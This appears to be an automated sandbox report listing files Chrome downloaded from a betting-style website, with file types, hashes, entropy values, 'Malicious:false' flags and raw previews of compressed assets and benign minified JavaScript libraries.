                                          Preview:/*. Copyright (C) Federico Zivolo 2019. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=e.ownerDocument.defaultView,n=o.getComputedStyle(e,null);return t?n[t]:n}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function i(e){return e&&e.referenceNode?e.referenceNode:e}function r(e){return 11===e?re:10===e?pe:re||pe}function p(e){if(!e)return document.documentElement;for(var o=r(10)?document.body:
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 64651
                                          Category:dropped
                                          Size (bytes):17446
                                          Entropy (8bit):7.986419785689049
                                          Encrypted:false
                                          SSDEEP:384:kv211Ot+BTk3TUrrZutyI6EHMit588/342SALXMWCFt:j11OtOo3TOAtyjpit5B/42dXMDH
                                          MD5:32902107484BCEA4BBDD212CFF7D8839
                                          SHA1:EF787384E54A4E9CA9E4274B04CB549E4B45C25E
                                          SHA-256:D466C9AC142A38070D5B7C3BBBED22D612EB57142872AEA789D4D4B4085686F5
                                          SHA-512:97260A1EED6CAED3B7E4C846B073E912CF606DA2F73F238FB29B09286DD26C78B9F8E9B0425D7D0BA964147072915E1D56727E09B0052D8AD886EACE96F36F3B
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........}.w.F....WH.==..)R..,h./v<7~...g&^...$!.1.0.h...._}.7@J.df....h.GuuuuUuu...<...,f../.....w..S.J.:G..}...^Dgg:g7).$Y.e.t.......8.Y..:+r?..=...q.Y....$........|2.G.....eZn..0.".....k]0]/.....b...]...~....... J._.....o......3.w.%).........{a....a.OPm8.U..L.e....|R...bZ....<...(.y....t.9..t0.....0...8....`.o.e...S...`;...`t.D...4,.{Dl..y.:.6..{....y..*..I=....../;~.%.}....h......4.~}Z......#.l...l...~.........../k..Q.._.R.........e...A.t.y...p.,..,..8.7.,.zNR..."i\.2....9..eW..F...Z...r.B..b}T..lr./777..2.d.*.^`1..."M'..^8/..EZ.....a],..Q:M.d..t$./g0D....U2.AOK.st.....L.*...b}W.s.=...l...{.-..L.k....4OF3...._.l..,N..d...,..$.0.A*.<eZew.....N..vZG......h......,...e......!..~.A;.ua..F'.%&|Xb.L&X.}],`$Kj........u.....IVa9.+h.`..ev.U85&..6.<.../".k.B.@.......H.....L.}N7."))W5/.zj.*...b.v.jf..s..4^o.u:...!.FJ..3N.drW@.^.8d\`..M.......D_m....IE..r.....nf.jm.l48.2.e..^.e=#2.&..(rE..^..*..Z.....Md....i<)..9....- .......~...{\..."N.0...t.^..N..[
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (11013), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):11020
                                          Entropy (8bit):5.483685795185953
                                          Encrypted:false
                                          SSDEEP:192:XK3b+EH+nqfhD9VUVjIItpfg5uXG3+1tSCl+7flvSXwaHxImISLTNSfYXH7Le2HE:aytnqflKFgEWulE8REcS3j/CkR1Xh3
                                          MD5:CA3C311AEA29F78A85D76E20A886DD82
                                          SHA1:A734AB1C6D1EF62E96CAC59D5C53BDF15760488C
                                          SHA-256:1437E669CCE1BAACC8BD2BA35ADCB59B9B6568DCA3FC7CCE275E1A3D525CD5E8
                                          SHA-512:49224691423228FD4E34E8FD775ED6AFAF95FFF2E28B17A0C338E662E20DCC1724D0A4580E326B05A19B1236B06BCD2962B4805BE0106DEFD8800A50E8F262C1
                                          Malicious:false
                                          Reputation:low
                                          Preview:.....!function(a){a.fn.slide=function(b){return a.fn.slide.defaults={type:"slide",effect:"fade",autoPlay:!1,delayTime:500,interTime:2500,triggerTime:150,defaultIndex:0,titCell:".hd li",mainCell:".bd",targetCell:null,trigger:"mouseover",scroll:1,vis:1,titOnClassName:"on",autoPage:!1,prevCell:".prev",nextCell:".next",pageStateCell:".pageState",opp:!1,pnLoop:!0,easing:"swing",startFun:null,endFun:null,switchLoad:null,playStateCell:".playState",mouseOverStop:!0,defaultPlay:!0,returnDefault:!1},this.each(function(){var c=a.extend({},a.fn.slide.defaults,b),d=a(this),e=c.effect,f=a(c.prevCell,d),g=a(c.nextCell,d),h=a(c.pageStateCell,d),i=a(c.playStateCell,d),j=a(c.titCell,d),k=j.size(),l=a(c.mainCell,d),m=l.children().size(),n=c.switchLoad,o=a(c.targetCell,d),p=parseInt(c.defaultIndex),q=parseInt(c.delayTime),r=parseInt(c.interTime);parseInt(c.triggerTime);var Q,t=parseInt(c.scroll),u=parseInt(c.vis),v="false"==c.autoPlay||0==c.autoPlay?!1:!0,w="false"==c.opp||0==c.opp?!1:!0,x="false"==c.au
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 54576
                                          Category:downloaded
                                          Size (bytes):5666
                                          Entropy (8bit):7.9502577323919
                                          Encrypted:false
                                          SSDEEP:96:8L5mRVH/KrjXqooRoZxhbv9+/r9o3itgDafNNwcYdkJBpS/McMV8ZCCzQaYl:8OVHO6RGv9+/ry3ugDidlJBw/Mcu8ZCD
                                          MD5:EE13F724BAE7018EBE07BB5D6AF03AAF
                                          SHA1:C50182CDF7E632E35EBDE9118B91E19D900B87E8
                                          SHA-256:E5FBABB419AB24FF6AF5DB9045338DB90C20E058B5AB94C02D2EC725E1C75F51
                                          SHA-512:334C0488EAA373438EA62D18DD93C6C79DDC0B9AB8FC8C4350D5792F5156AB8ACDA55E9D39728CEC48C1D2714FA8E339D361B449ADA34879F23704C092C043D4
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/themes/hongbao.css
                                          Preview:...........]{...u....aD..Y...O.0..[ 0......pv.q....VkA@..u.*Q.6Q..h.....e+..e4....|.K.{y.w.V%A........9....}..../..a..gg........9.........A8...\o.....F0O.Ep.L..x..z..r....`n......y|4...8..;........p......Z..N... 9...s.(^...x>J...Q.{.j>fI%.....9.5.....$..&.5..g.........E.Y..$=Z....9qz....k..7..p.L...Y..c..q..........G..S..u2A...5(....{..Z...!...mG."..$8$0j....8.g.p...z.....'I|.c..v....s...-.CX..k.v.I8...]........z..l?.....^..a.cM.4.v.$......(.g.pA..h.H...p..su+.D>.i8...1XC}Ll5.;Ia.S..~.[..=...7...<R..>..|m.x....N..N.W^yE..0&..8..4..Q.{.....(.Y{.....Tei.O....*....d!X..R....)g....s....P..Gv..u.$.l...cr..._'..n.N~.zp2.........&...s..5...c..arR8/}!...n.4.`K.:{*...xx}....1...\oc........{|4...).s.OG..O...Q&..d*?.v..\.yt....3.<.L.........|8..h._c...O.2......4.-F.w..........A.....>.p..z.(.m..moo..-G..'.Y.}.9LM.....g...._.C.x..Y...`.o...FU.x...(.~..n..U#.{..)..x..I...)}..m..y..y.<G..M..#I;..5..kP.......$`. ?.t.....W.V.a..q8..w..<}V.a)..w..D..S
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1092 x 720, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):103738
                                          Entropy (8bit):7.953096936376712
                                          Encrypted:false
                                          SSDEEP:1536:2OUm/OAsVxwc2a+N92Nvxm4YxsmhzsKnJkmlP8MoSG+cGm3rZMM8a8QjtUotUTga:2CpU7m7OEnq80d5ZCQjtB92Jq38Tzl
                                          MD5:FE21BC54B27A9F17051B8B20272B84ED
                                          SHA1:B8F46EFF9DB9C7DDA22E84C6068217F5E5CFC19C
                                          SHA-256:92BFAD1534C35E59192341700DD98B1FA3783085842A4E56F1EF6EF7C52B15A1
                                          SHA-512:FD9183A940A4115C4937786CAE5AF64C115FC70537C46B58DF7001241DD3C9A4DE2101167A8055032EA132CF8A2ED0CE79AF5A3D275F975A4CE5B1518E430CE4
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/images/errors/bet-ico-bg.png
                                          Preview:.PNG........IHDR...D............L....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.......{.s..<.4.(. .. $c!l!. ...w.......g...2...}.........8..e.o..$c...D.B(..&......W]SS...'u..v}f...v..r.9.{.R2.d..........z............z............t..T.I.T..H...&.C>..h.K..A.9..6.0.........*.........Ur[E.$.6...Q..T].T........-.m[.O.....c..(.<.l....].J(.....'K.!. ....... .Q....*..`.......5R...L;S4..g....G.......h.DDf.U..E..K...P.v.X....gTIDq.... .V...b.._>|.F....f.K..4....".U....T....~.....G..{Fn.,..w........1Z>.Z..X.9#... F..T...........z.I....-..l.M...B.V...8.L..kH.......m.0....s4.V.......K........e4....Sf.q.2S..A!P...Q. .%..@...?h.D.N.p.2'..oz,.... {...C...>.L..dLf.g......t..<S...../....b1..>Sw&...#_.+..5..$.....Y(.J.p8.x0.K>!....$....1...Cq>.."u.......*Xzr...3d......L1....e.k:..T."Q<:..r..,...B..X..e.. "..G.X.2.`0.W..m.....j...?....~Z.H..y../.....3........Z.?.V.....^}..%K.O..?.c.M_.RWuUU"..*B.C........g.......=T.hMp.eS.Wf..A.Q.........{...<.{L.......9.U%p.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 95956
                                          Category:downloaded
                                          Size (bytes):33545
                                          Entropy (8bit):7.991500467452054
                                          Encrypted:true
                                          SSDEEP:768:3b4WXZiJP7IXtOVX6bqn82lJ7IivEicAWGIVuQZikRRKv:3RJiJTIXwAGn82lJ7/vh5IcIRG
                                          MD5:DDC1E8FCE07F211AFD9C03035149256D
                                          SHA1:BB86A4EED0E665D56CF8F4B211556F6876F7FDA0
                                          SHA-256:A4FE9A045492402A80E14D3821974814DBFC12F3F435FB448356ED97CE66A81A
                                          SHA-512:21B2902A443852730F40322D1983F0E79917855FC2570A0F5A4767C7E06E27DAEC3B50235ED934A49414E2D0A8877202BF62D3BFB0C540612D33EB0845153336
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/js/jquery/jquery-1.11.3.min.js
                                          Preview:...........y{.......".C...%....p >...xKf.;.h?.HB.&...,2...[..h,.;....\'#bi.Z][.r.sv...|.x.f.........48{~y............,...:.r............H...?{v.....*E9?VI...<.{Q.......r../.n..~.v...w..m...uz..W.QB5w...l(x*.~.,.......*.8.l.]o}O.b.....|w..=....<..9./.`..........C..{4.|Z.......#....b..#..o..h<QY..w.!..U.^..^M.rs....]P....j.=.U........X.......w....M..?.[.ZD.,...Q.]...~....b.o.j.].<..]....._...r.;.....5.;_../.&.8...Y|..$......z....i....8D.....kLX.$....M.n..O..m.T.|...E......?.n..r.mCY?.....M......../..(.]^.#...=....I(.&a.2..}..V..*&4.e...\.....T\B..7....u.....>.+..F%G...<l..e..%%...7m..*m.}.b..p.....e.....T/.d...*...f.x.=..x..P......*...K*...Y.|@e.)wVL.Q/..X.$...].gz.]v..U:.....I8...Uvr.v.......4\.S.#4..F........_.....S;..8}.!.b..g*WS..v"...v.<......o..`8..K..E..J.9.v..hV.l.+........a./v..~.....:...(*.......<..W.!*".*;..+-........<...8..J...u.(E..].....q...&.C.cW.;... .F~B....n....e..b.dh..u.[.2...:.74.Ti.f]dg..7\........?.......Tx=...&...[<^.A...E....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1200x597, components 3
                                          Category:dropped
                                          Size (bytes):50894
                                          Entropy (8bit):7.8283287724968185
                                          Encrypted:false
                                          SSDEEP:768:LueHiG76uKbBo7dZw4ZuvjLBjbONixS5ffDYMBL0HQy32p7/Ff3B1VIN:LHCG76uZAvV+lLYMBEQymp7/h3Fe
                                          MD5:D7A708C815B447A13FFEC99050B7D362
                                          SHA1:209C52FB1E014284DFA9C7CE36640F86F9BAA96B
                                          SHA-256:3B84BBE81B33F9411A58FCA3F68380DA11B6B9683ADDA2DCA95C6A1E7357A106
                                          SHA-512:CFE8A7EBC89830D308EE553C7425240D5B8218619829C48541A4BE6927AABA1D643DE94CF54D3CDEF7A1D98B020EBD30C2F29254D1DBB3E3E56AEC0AF2C9FBC3
                                          Malicious:false
                                          Reputation:low
                                          Preview:......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................U..................................................................................!..1AQaq............T..4."R.S$32B.#CDb...c.d.....................1!A.Q..aqR.......23S."Br#............?.._N..W#...{i.}.}.&.....a.*4b...A...>..a...#a..&.Z..i...i;.}..E....k.^D.=#...U}......S..d...[...=....s...\.|.}...?._..[.7]}#..&.^.w.......w..u..+_..3k........w}H.i....>O...l...............i..\.~_.oz.......w.o_.FO.OI..>_....g.......e..r....#/...:.E........~J...=.........:.GY.|....V..........|_....|..?.t[.._.G.{...~/....:.......V..|..|.......F...........'......W.....?......~...._h......7...tY.~d.......V.m..?.....k.9......U...7..+..w....~.._h......>O..WJ..6..._.{...~.....;k...g..._..o....o...c..g..|?.....k.Y.......t{.;.L..{.....=..E.>.._h......~L....._?..3.....~./.....G._..k..O.._..o..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):8809
                                          Entropy (8bit):7.93194070897274
                                          Encrypted:false
                                          SSDEEP:192:itU77R36W0ZE7Rrqx4dhImXjt78AOyr4yE2xpDGitogs+Yp:X7Nf7Fqx4d2Et7vMc2ic
                                          MD5:D9F4BB7D34583C33B1FBC7F6BC82D63C
                                          SHA1:44B48B0E5649A48789EBB60B4E12E5DB0D684BBC
                                          SHA-256:C31F6A40C5D886E499CFC2D99AFE7D35CD5D71E5D960F34046AA0451C30B6C68
                                          SHA-512:9E3C0F4A7965DBBC834DAC066FF7A6DF97D8FA82A5B661DB7669EC7A64B111E2AFAE66E6D9431EA380F49B1F8BDC50BEF4552445911D07960445B636D1CD5049
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR..............2......PLTE........................................................................................................................................................................................................................................................................................................................+9l....tRNS........A..f).VM74,$.Q.cZ...I0!..q....w.|....Ey:&.`]=.....nk........t.l...........h?<1..t^..bQ.....|..8...SH.t+...}rRF...UR".h..M.,....IDATx....w.U...4i..K..}...LWh+.l.U@.DqC.q..<*......|oV.kf......q...7....}..wg...._.....=..5..'7..!........O_HD.Q.N....3.<..M..Hf......GNwl....l..!..i4..j'=".1mp..m.g6..L_.\..yH...z....l+..%.....r..>N...8|n~r.l.. |b.{..<.ak Ju../..E;.^9..\.RC6.Q...f..N....P.R'.Pa....1....-?...>.?.....Z.d...@..A.gi....U../...%....@....W...*<<EV..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 22006
                                          Category:dropped
                                          Size (bytes):7599
                                          Entropy (8bit):7.968812814531643
                                          Encrypted:false
                                          SSDEEP:96:UCnHGpv0J0C/Iy2hh3zrHg+Gd7mhLabhwHp0KuClDpEclAdCX+gZc:UCnM0Jz/Iy2LrHgz7WL0qplINic
                                          MD5:84191D1091731FC35BABF501FF6A08BF
                                          SHA1:13F401266FC74700486A120BB0DF31E00152F492
                                          SHA-256:51BAE893893C406293BF77A7D6B84E7741607005BD99A64BC9E9BE8F3A2A13F0
                                          SHA-512:767A734B8FE2EAF78FADB068CE5629DC20BC917E87C6D954FFC3E36E8386DE6B3FA4306C1AC690F7E0562FCB97338C80AAE94B7B98C233C21E1A842147117817
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........<.n.Hr...2.".+..d.=C..ffg..fs..A..Z........-.x-.I.(y..A....erH.#U...(..&0`.?.]].U...Nzy.....y0.........../...........y...>KYQ.^o..&:;.......\..z..z.........Wg...,.E..p..Gg./..R.L......L....l.../..;....U.G...-./.t.f....6..y.f0.+..j8..Y.mU:....`......r.:kV.1..*.U..z{.@.wn.g.K......7K.9s........2....>+...........-y4.....fN.W..._....W/^N......}.U._?.>q.>..0..........lY%k|..d.P...65.....?.A..3.....n...B].v1b....z.(XP..[l..H<......*7......[6u.5N..t.n...<+>Z@.........O@.4T.......W.........%...s.n...K8..].'r..#...1.\..y.".<.<v..{A.6y.2...`.....8........ ..8...5.aT.K.b.;~..*........"^..kx..n............*..n...B........Z`.0Ho..S.bT.e..}....*+....0G.w.}.g..........q.o..f..Ge...=...|..|.R0.\/.....Y........,....*~.........$.H...U..]....x.....I.\.^''..^.........|.s....=...]......u...k....;.....l4..F#.d2#.#...~_>....{.b......E...*I2?..n.B.(N....@..}.@S..U..<_...G..N......(.:.......a....1Y<..U...L.vL.....b.b..*t.3P==X1J....P.l..*.....Jq........
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 17340
                                          Category:downloaded
                                          Size (bytes):4031
                                          Entropy (8bit):7.951043479428025
                                          Encrypted:false
                                          SSDEEP:96:3vr/VW5yfLX072+gQ6QP9y0gO+YygZH19PI7yziG:fr/VW5yTM2vLu9y3OByYH19tziG
                                          MD5:3A90921ABC0A5219AD4E664BDE3E21E0
                                          SHA1:FFBC673A0954970A87F93506625F066522959388
                                          SHA-256:41F06410D8ADF8C53247DBE6C9972165E4A9835C8089CF5BAC8198900AAABEB5
                                          SHA-512:5A6692D358CF69F398BDC8BEFC0EEA3641927D019C15B62D352DD15F9D8BD7E4A2CA72BCB89686C13AC891AE59A3A779A0B7FE7F598A193A20F77102F240A691
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/js/websocket/Comet.js
                                          Preview:.............S...w...&c....:....&460.n..x4B:..q..;.a.f...'.w(...I.;...p....O...o.vowoW..G..0....o..)...c._.g.f...m..se...s...3..,..=.c{.7_5.!4.c....7Z...O....6n>._.~....rc.....g.921>..l.........X.!! ~}...?..6[...W.....x63561....Y.%..o.Z..."..X....G9...........ht..Q..Ld.QV4.-6>Zo.=..q..|....H.sdl$..:6.%\.'.8DQ.tSG.B.=.l.A.G.3.2.....7....#..*.....4.2.^y.L..y..-xf./9kzS./.G.....U*.k..9....M..(.K..B.hV..&..R.+...A;Up.9.u... .,..q.^{&.?4d.........H.aj.c.0+...l.*T.x....G./...... ..B.....> 3..C$.R.......?...2........c.w..@X.\.b&....5n<.......\?.._{....N.....X...S.6...$..".I.P<..N..p.....@.+2..o.P...!qy..4.(.*..B.}..(....F..F.:.....({..9.1S@....a..$yY....y....jk.N4..7.v.........5.@..D'.t.C.O.L6...K.v.5@Tp.b...bn.Y..?.V.%.>k.?....mY...7..Qm.......~(9i........R...#..v.........d.)..3!.............'...D...H.n&.)^.Pa.Q......w=.B.Rs..P.k.;.]./.B..C.__.|..u.r....\.g....3Ke.j+..&.L;/_5o.0U."8......J.............*..@.A.".....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 14857
                                          Category:dropped
                                          Size (bytes):4126
                                          Entropy (8bit):7.9584178336988485
                                          Encrypted:false
                                          SSDEEP:96:YK+LFVnC8QaQV08CIFufD2xOx/mpTWTjvwCnxdBOTi:l+LFzh5r2xymVW/wmr
                                          MD5:E760677F4C48D9F9E8B95EF4B6F87FA8
                                          SHA1:1E8731B8C43003B65A5E7132D6E51D1E991EB125
                                          SHA-256:3E6115C7F94633F37AA0482064FF05299010E6B7D36B3EE8698389F83F5536C9
                                          SHA-512:1EBB5B6C821891EB74621CB973705D6B61CC3792823080FE7BA869BB1C0DC18818E6CA84F38F7C1D601A047B11D34E64AA554093430904DD9789A600AC1D0487
                                          Malicious:false
                                          Reputation:low
                                          Preview:.............r.6.Ul.+..EKv.&.iO.8Mf...z?$.CI.."..r..".,.N......R.]....8O.....b....d...0..I0...Y..;.].d.7..0...[..j4.....g.g..a).[.._.(......bY.(.+.f..#.:Ea....z.I..Q.:..O"..`..U*.e....E...}.......h.Z.......O..^&..b.,.<.W"M..2.....Y..;..^..R.e/D..v...d..e~......8'.s..8I.......'.a..bl.0s....8.\....0...\lL..5.=y.g.h.Vx.h wO..B.E+Yz>.U#.jm/...6[..a...z-..F@?..d.h..V*....I...e.fq.?..s..uQ..r4...*ASiz...%.l.t..."...M...,...p.>c:....$.5M...r.....v.g;.M...b.+Z/..rpR...A.y3.-Z.(...1T...y.~)..!.K...`<6.Ri.$TO...bs.u.H..|.8.M....E(.)...R..,..3 ^gS.........#J+"^.......J3.9 Z...B.c.c...@.e<......9.).q..n......W.J..i.I.A.z...yd...O..P>..|..b!.q..&~.....y..Xd0.......V...m.......d...:.F.C.#.\].O.y..fX.i...^.....#MAXP_..F..ow.3.J.....k....q.>`..p..uA.w*....$....D.......Y$.<]J#..8?d....F....#..V3lZ..r............mg5LE.k5Hq.:P).....-..daP._..W. [x..2&e.:.E%..9.......[9...`.&..3..oo..+]..i8....C..V..hc$.Y...........^.......v....C&2N1..4.NEj..`. w....2....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (734), with no line terminators
                                          Category:downloaded
                                          Size (bytes):734
                                          Entropy (8bit):4.868554581606508
                                          Encrypted:false
                                          SSDEEP:12:1cqBUdX00OlM3GryvrIqE/NtttAedDH0gh8q9ZupLfgDeZiMEdvjYvZF:1ckU100OWG+yrvdDH6qj+L/EdbYH
                                          MD5:62F09514F62F2C58E309B97F7EFF9498
                                          SHA1:B1D21B21AFF68B45A1F6974AF36072494B7C47A9
                                          SHA-256:1E22021B5E32AA80920143FD9CEAF19732FFDDE177D964C92D1C517ABDF32EB8
                                          SHA-512:A7179C68BCE3729FFE3CD393B6A458C4F24878AD6C7391D8AD04552B378209A4ABB3D5756078FB41E83E922C7AAFABDF4D0520FF7E70A8DB75827F543281EFD4
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/ClassTool.js?v=1736150851437
                                          Preview:define([],function(){var initializing=false,fnTest=/xyz/.test(function(){xyz})?/\b_super\b/:/.*/;this.Class=function(){};Class.extend=function(prop){var _super=this.prototype;initializing=true;var prototype=new this();initializing=false;for(var name in prop){prototype[name]=typeof prop[name]=="function"&&typeof _super[name]=="function"&&fnTest.test(prop[name])?(function(name,fn){return function(){var tmp=this._super;this._super=_super[name];var ret=fn.apply(this,arguments);this._super=tmp;return ret}})(name,prop[name]):prop[name]}function Class(){if(!initializing&&this.init){this.init.apply(this,arguments)}}Class.prototype=prototype;Class.prototype.constructor=Class;Class.extend=arguments.callee;return Class};return Class});
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 12328
                                          Category:downloaded
                                          Size (bytes):3610
                                          Entropy (8bit):7.938711080111192
                                          Encrypted:false
                                          SSDEEP:48:XKAwdhOZsbcJeBDSgVAOOl+nRCfFpswLCwLOeuM67MxZw6BdUL9ZPQ9Cba+T0yRW:tett2unsfF3/OeaIw8dUvt0L0MFtJwJ8
                                          MD5:E23F3A0A4EC65A23DFC4AA62092FD2CD
                                          SHA1:3A6B655B11E67F05C6A892C7453EDCE9A5DBE197
                                          SHA-256:A536D285DECA9B96FACE9FCBE00017E107E48BAC06750342CE962E2758FE8F4A
                                          SHA-512:135E0A55B189BBAAB2E8BC5DE254317B6135E70CEC5304F47CD1E4D2CDE30BFDC20328D6BB24881607CEC0AB12D7B9D9781CD6A9952FBACE597A877B4493F875
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/js/jquery/plugins/jquery.poshytip/jquery.poshytip.js?v=1736150851437
                                          Preview:............ks...*.1D...N.<.8I/3.8.x.....Z.,.(R!!........_..I....,......b..e.&...?..HF........Up/.._7Y..a.......}..M..m.||...O?..?..{|......m....g"..t.YO&a:.D"...X..|.e......YE./Q(...6I(.Q"B...A....B.^....e....K....S.^.....".9Lf.a.v1..m6....F..;?..r......W<].c.Q.a......L.>..(E.Z....E.5*...6..+4j....[7.o..a4..<..1.0:4.c...........FI"H{..i..cgoN...8.t;...2].oYt....]*e.2.b..5v....[.%.c....5p..Z....pW.JX..o...Z..8....%..ai....<..E./.8.jl.&...'.8V#Q.I....:.,......Y.4.0'g.A...\D.....Rf...l......J......W.}N#.Rh.5.4..-....e..L.|...lX..s...U...0-.z[w.\>....Bm..X......Pk...../;...y...L.@7n.. ......=O.....Uj... ....Z;...*Z...K.d".j`..;.U.....RI. .vq...G.-..s.v.O.CRD.}+.`'.R.w.fPQ.(..p.:.P....X[....8Jw.....,.a.+.....Y.(J...`....:H......d.u..JF..dbU....../ 2.pl.WAv/....k#...s.%y....m.I..pT..r..(|..)O..K.....v_rW.x....(^(QC.D.._.^..V..d..c..W.]...):..y.d2,).4A<..i...3.sk........s8T.WY......K....>...)v.\.N.R5........d....%S.5.BR.U......c..Z.#!.\&?C.#
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 51040
                                          Category:downloaded
                                          Size (bytes):6923
                                          Entropy (8bit):7.966497753792618
                                          Encrypted:false
                                          SSDEEP:192:gGzWJD0UqUdMjERb7WA4oosvijz7tpdNoyjlMR7i+:gIWJ5qUrOAfVqjPtnSgMhz
                                          MD5:657C75ACB32EC5C4BBE754E74CEE87F1
                                          SHA1:EAC1C97F5890172E01EF96F7072A61E16FB092B0
                                          SHA-256:EC2DBC190D02E033780990A716E52AD3672EF244BF71CE89923157309B744934
                                          SHA-512:E2928D994B69961B7AC13E78EBF8B54ED947A7127BEDBD7128784C880662A83DE5C1343E76D45B1BBEE883E526711C9FD81B10A8066991C7D38E3C55BC770300
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/themes/gui-layer.css
                                          Preview:...........]{.#.q._.b...;.7....%d$.|..+.")~. .d..-9C..ooE...).l9..."..99.q...9.WQ.|.56.`.....~.3{{.Ow......uu...N....y........9^.&........?80..t:.c.{........]...#g|8...71......../2~.].. r.h`........V.d.z...2..-.x....t.......G..4.`...3q..a.7...;...d.2.5D.o.U#...<rQ]0...l.!...J.G.-3.;...U.2PM..,+.....i...{...X.V...a.`..............7.....]-R. ....X.;...F...3....l..3H.8U.H..*.:X\i]w.........,....O...Z+ov....@.....iB.......A.7\.nE..pg.AZ....I.`c.M_[.....p".&.....7..`/....Sg.............\...z.N..K........ r..<........;...F..g......x...<...O.>.H|..7p..}|n|..K.W;;.Bx..1p..J-.........!r.|..wh...hG.I..v......X....y.F.b...*;..........`6r.X..O.}U........u.........g..6.{.....e.F.@[F..cE..em..l.Z...z..SuK.}-.$.x..d3/.s.1...s......t.......a5r.5..S...M.j.*I...<.S.(N.c....8q..V.r.v..D0G=h.....B..Wh.0...8r*=.!'.0.$...((.Z)'..EE.,...D....KV#4Z.Bn.(..T)7....M....D..s.MS#.d@...d.6F)4jP..MYrI.I4.F-..Ft.8.i...gW1...T.T#Mb-.JSUpia.$..v.x ..........?q.B..`0....YG>.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 4627
                                          Category:downloaded
                                          Size (bytes):1163
                                          Entropy (8bit):7.840917616071798
                                          Encrypted:false
                                          SSDEEP:24:XQY/Ntb79eamFnmO6Ym3lbkp518uFjO7UY+NycWBcJFq7uB7+p6OPJ3ChtFa4:XLv9FS76nbkp3PehvAMV6OPUNf
                                          MD5:2FF7585D68BC406EC33509CBA6DFAA2B
                                          SHA1:3A8CAD4B27554C427AAC87EDF157FDD072F9795E
                                          SHA-256:CFCB96383165A2EDF48B0F084D9B1C77BC44FD2631BDAA2F1DFE975A2501BF4A
                                          SHA-512:76C45EB4ADBD8B16589167C91BB248D22D7DEE7A178FEC8070B780A0B452FB32BC0C0F19EE62034F80BA2D24CAE1E2EC50D96FAEA4B444A63D5E954593342B15
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/themes/error.css
                                          Preview:...........X.n.6....>$....\N..........`....8..A...m GS5Q4...X...4.IvM..7..%...DX............jw...G,........u..A.F\......Dw..p..T.$.../{...^....".x`.....\Ptx.p..C.J.:..,...S.....M......y?...o...o...hH.YS.k..F.q;...6..;..qk......'.>Q..$.Nk.._....tx...-...B<u.i.x2.!R...-........:~P.V.....L.4".7Hb...AR..g.P.^...`B....g..Q9Y0...[+.N.E8Q..d..t.O.tM..5 #>.".....5 #M.9ML.Q..-.c'9g...R2qa..q3..T..X.s....M._.Z...*..3...j.V1.e.&.U.e),..1.p....._......V..`1....S...K...F....S.....<.,f.......g.j..4..s2.).7....t..E.e=*K....E?..g\.N@..d.J;...Z.8..8:.....&6O.W-..M1.......{C.m..ni..j..@..vx.X.....-..s|p..um. R.&y......mn~...i..M..7...rs..R.F.ss;..82...!............R4...S.......F........yh...<.....z,.Y...+Csb{D.\E90...8{...z....;.9.....z.O__..8.1R'6s.m=.. ..d...w.s9...d@a....^&F.....A....*..#g@I....v....%.........1u$.3....3.g.2.L..bc...S..E.u......qY...b....}..Oy#O...kp..}..1W..t.....!.]J\5...E......Uz.o.G-.......j...Y.MS..Q.^}.RY..3d..Pe. ...n...r
